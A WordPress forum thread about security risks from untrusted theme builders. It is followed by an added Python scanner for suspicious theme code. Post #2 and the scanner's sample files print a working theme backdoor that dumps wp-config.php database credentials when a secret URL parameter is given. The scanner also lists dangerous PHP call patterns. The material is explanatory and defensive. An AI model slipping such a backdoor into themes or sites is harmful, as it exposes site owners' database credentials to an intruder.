
Thread: WordPress General question about Security

  1. #1 (Join Date: Jun 2010, Posts: 3)

    WordPress General question about Security

    Hi,

    I have finally given in and installed a WordPress blog for our company.

    I really do not have the hours it takes to learn it all, so I would like to have a new employee who is really tech savvy and good with WP design the theme and install add-ons.

    My question is about security. Since I am unfamiliar with WP, I wondered if there is any way for him to do certain things without having complete control. Or even if he does, I would make it for a short time and then change the main admin password.

    Any advice for this blog newbie from someone more experienced with this situation?

    Thanks in advance
    Keybler

  2. #2 (Join Date: Mar 2010, Location: England, Posts: 1,144)
    Hey, I was thinking about this the other day: about how NOT safe it is for people to use WordPress themes without knowledge of PHP. I'm not sure if you know anything about PHP or any other coding languages, so I'll just give you an example:

    WordPress, like pretty much every database-driven website, has a configuration file. WordPress's file is located at http://www.example.com/wp-config.php (assuming you installed it to the root of your website). Once you have installed it, it will contain your username/password etc. for your database. This is my configuration file (it's for my local server, so it doesn't matter if you see it):

    PHP Code:
    <?php
    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME', 'sandbox');

    /** MySQL database username */
    define('DB_USER', 'root');

    /** MySQL database password */
    define('DB_PASSWORD', '');

    /** MySQL hostname */
    define('DB_HOST', 'localhost');
    Now, where am I going with this? Well, if you give him access to your website via FTP (which there is no reason why you should need to), then he can look at the contents of the file.

    Another thing, which is my main point, and my biggest concern would be this: if I added this code to any WordPress theme (I would have to have access to the source files of the theme, i.e. be the theme builder):

    PHP Code:
    <?php
    // Backdoor dropped into a theme file (header.php, footer.php, functions.php ...):
    // when ?hidden_fact is present in the URL it prints the wp-config.php
    // database constants into the page.
    if( isset($_GET['hidden_fact']) ){
        echo DB_USER . '<br/>';
        echo DB_PASSWORD . '<br/>';
        echo DB_HOST . '<br/>';
        echo DB_NAME . '<br/>';
    }

    Then if you went to your website, http://www.example.com/, it looks fine: you have your new theme, it looks great, works great. But when the theme creator comes along and does this: http://www.example.com/?hidden_fact then he/she gets your database information.

    There are loads of similar things he/she could do, which is why I think if you're going to use WordPress themes, then you should know basic PHP or basic programming.


    Sorry for the long post, but I felt it's important you knew about the wp-config.php file as well as the little trick.
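Editor's added example (not part of either post above, and not a WordPress tool): a small scanner that looks through a theme's PHP files for the trick described in post #2 before the theme is activated. The three sample theme files embedded below are constructed for this example; the pattern list is a heuristic of my own. It flags two things a theme has no business doing: reading the wp-config.php constants (DB_NAME, DB_USER, DB_PASSWORD, DB_HOST), especially inside a block gated on $_GET/$_POST/$_REQUEST/$_COOKIE, and calling functions such as eval() or base64_decode() that run or unpack obfuscated code.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample theme files for this example (not taken from any real theme).
# "shiny-theme/footer.php" carries the trick from the post: a $_GET-triggered dump of
# the wp-config.php database constants. "shiny-theme/header.php" carries the other
# classic pattern, an obfuscated payload handed to eval().
SAMPLE_THEME_FILES: Dict[str, str] = {
    "clean-theme/functions.php": (
        "<?php\n"
        "// Ordinary theme setup: register a widget area and load the stylesheet.\n"
        "function mytheme_setup() {\n"
        "    register_sidebar(array('name' => 'Primary Sidebar'));\n"
        "    wp_enqueue_style('mytheme', get_stylesheet_uri());\n"
        "}\n"
        "add_action('after_setup_theme', 'mytheme_setup');\n"
    ),
    "shiny-theme/footer.php": (
        "<?php wp_footer(); ?>\n"
        "<?php\n"
        "if( isset($_GET['hidden_fact']) ){\n"
        "    echo DB_USER . '<br/>';\n"
        "    echo DB_PASSWORD . '<br/>';\n"
        "    echo DB_HOST . '<br/>';\n"
        "    echo DB_NAME . '<br/>';\n"
        "}\n"
        "?>\n"
        "</body></html>\n"
    ),
    "shiny-theme/header.php": (
        "<?php\n"
        "$p = base64_decode('ZWNobyAnaGknOw==');\n"
        "eval($p);\n"
        "?>\n"
    ),
}

# Request-controlled input: code gated on these runs for anyone who knows the URL.
SUPERGLOBAL = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")
# wp-config.php constants. Theme code has no legitimate reason to read them.
DB_CONST = re.compile(r"\bDB_(NAME|USER|PASSWORD|HOST)\b")
# Calls that execute or unpack code; common in backdoors, rare in honest themes.
DANGEROUS_CALL = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|str_rot13|system|shell_exec|passthru|exec|popen)\s*\("
)
# A DB_* read this many lines after a superglobal check is treated as a trigger path
# (line-based heuristic, not a real PHP parser).
WINDOW = 10

# (path, line number, severity, reason)
Finding = Tuple[str, int, str, str]


def scan_php_source(path: str, source: str) -> List[Finding]:
    """Scan one PHP file and return every suspicious line with a severity and reason."""
    findings: List[Finding] = []
    last_superglobal_line = -WINDOW - 1  # "never seen" sentinel
    for lineno, line in enumerate(source.splitlines(), start=1):
        if SUPERGLOBAL.search(line):
            last_superglobal_line = lineno
        const = DB_CONST.search(line)
        if const:
            if lineno - last_superglobal_line <= WINDOW:
                findings.append((path, lineno, "high",
                                 f"{const.group(0)} read inside a request-triggered block"))
            else:
                findings.append((path, lineno, "medium",
                                 f"{const.group(0)} referenced by theme code"))
        for call in DANGEROUS_CALL.finditer(line):
            findings.append((path, lineno, "high", f"call to {call.group(1)}()"))
    return findings


def scan_theme(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of relative path -> PHP source, in path order."""
    findings: List[Finding] = []
    for path in sorted(files):
        findings.extend(scan_php_source(path, files[path]))
    return findings


if __name__ == "__main__":
    for path, lineno, severity, reason in scan_theme(SAMPLE_THEME_FILES):
        print(f"{severity.upper():6} {path}:{lineno}: {reason}")
```

To run it against a real theme, read each *.php file under wp-content/themes/<theme>/ into the same path -> source mapping and pass it to scan_theme(). Treat the output as a reading list, not a verdict: a "high" hit on DB_PASSWORD inside a $_GET-gated block is exactly the backdoor from the post, while a "medium" hit or a base64_decode() call still needs a human to look at the line. It will not catch everything (code split across files, or a variable-named function call), which is the same point post #2 makes: someone who can read PHP should look at the theme before it goes live.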
